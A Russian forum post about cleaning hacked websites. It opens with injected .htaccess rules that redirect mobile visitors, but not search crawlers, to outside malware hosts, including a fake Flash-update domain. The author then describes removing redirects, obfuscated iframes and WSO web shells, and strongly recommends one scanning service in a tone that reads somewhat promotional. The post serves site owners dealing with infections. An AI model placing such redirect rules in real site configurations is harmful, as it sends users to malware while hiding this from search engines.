RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iphone|ipad) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://load.getwap.biz/?l&source=.htaccess [L,R=302] # on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://get-flashupdate.ru/?go&source=.htaccess [L,R=302] # On

[andreyvebuiskii]

Я вот тоже столкнулся с похожей проблемкой.

 

Заимел тут себе три новых сайта на поддержку, чего, думаю, чем больше тем лучше. Через месяц или около того два из них были забанены Яндексом. Смотрю - пишет, что Софос нашел вредоносное ПО. На одном мобильный редирект, на другом,- iframe.

 

Сначала попытался разобраться с редиректором. Вроде все шло хорошо, я нашел в .htaccess несколько (ну, более сотни) не мною писаных (ну и, естественно, не клиентом) строк с условиями редиректов под кучу разных мобильных устройств. Благополучно вырезал строчки, засейвил файл, протестил напрямую с мобильного устройства - редирект пропал. Затестил через реферера (представился Яндексом, потом Гуглом),- тоже тишина. Вот, думаю, и отлично.

 

Начал ковыряться со вторым сайтом. Нашел айфреймы только по использованию некоторых JS-ных функций (unescape). Фрейм был, естественно, обфусцирован. Написал быстренько сигнатурку, выпилил все такие фреймы - вроде сайт не упал. Написал в Яндекс.Вебмастер, чтобы проверили на редирект и айфрейм и убрали сайты из черного списка, но как же я был самонадеен. Пока Яндексовцы проверяли мои сайты, они (сайты), будь они не ладны, снова подцепили какую-то дрянь, но уже другую. Яндексовцы так мне и написали, что мол, редиректов и фреймов нет, но есть то-то и се-то.

 

Стало понятно, что на моих ресурсах есть какая-то дыра. Искал искал - найти не смог.

Начал копать нет в поисках какой-то софтины или антивируса для сайтов, который бы мог мне чем-нибудь помочь. Фиг найдешь, скажу я вам, что-то рабочее. Кучу всяких ресурсов пересмотрел: то сканится только поверхностно, то по одному файлику нужно закидывать, то вообще есть один софт (скачиваешь его себе, заливаешь на сервак, запускаешь через консколь и, короче,... не работает нифига) нерабочий, то только защититься предлагают (а я-то уже подцепил заразу).

 

Максимум, что из традиционного и внятного нашел - были предложения от всяких студий и фрилансеров с заголовками вроде: "Вылечим сайт за 2000 рублей" или "Гарантия...". Вообщем, фиг знает. Что-то я как-то не особый ходок по "ручным" сервисам. Потом залез на Яндексовский форум безопасного поиска safesearch.ya.ru и наткнулся там на сайт virusdie.ru.

 

Зашел, смотрю, что-то по стилистике на Яндекс похожее. Зарегался, добавил в список свой сайт, скачал файл синхронизации, закинул его в корень своего сайта и офигел. Я смог просканить весь свой сайт одно кнопкой. Все файлы, включая .PHP-шные! Сканился, конечно, минут 10, вроде, но просканил 4 гига данных, нашел что-то около 50 угроз в 70 файлах. Смотрю (а сканил как раз сайт, на котором раньше был iframe), Вирусдай нашел мне несколько файлов, помеченных как зараженные, которые содержат какой-то "Shell.WSO".

Нажал лечить - все вылечилось, некоторые файлы удалились, из некоторых вырезались куски кода (вроде как раз вредного. Я смотрел, т.к. на этом ресурсе можно еще и контент зараженных файлов смотреть с выделенным фрагментов вредоносного кода, вроде точно убилось то, что надо). Проверил сам сайт потом - вроде работает. Админка тоже работает. Ну, думаю, давай попробую еще раз дернуть Яндексовцев. Пусть протестят. Протестили - все, говорят, отлично. Восстановился в выдаче. Со вторым сайтом также поступил. Тоже сработало - тоже в выдачу вернулся. Теперь вот уже вторую неделю от этого Вирусдая получаю отчеты каждый день.

 

Находит постоянно какой-то подозрительный файл, который автоматом они не убивают, сомневаются, похоже. Вообщем, рекомендую Вирусдай и спасибо "dym" за наводочку!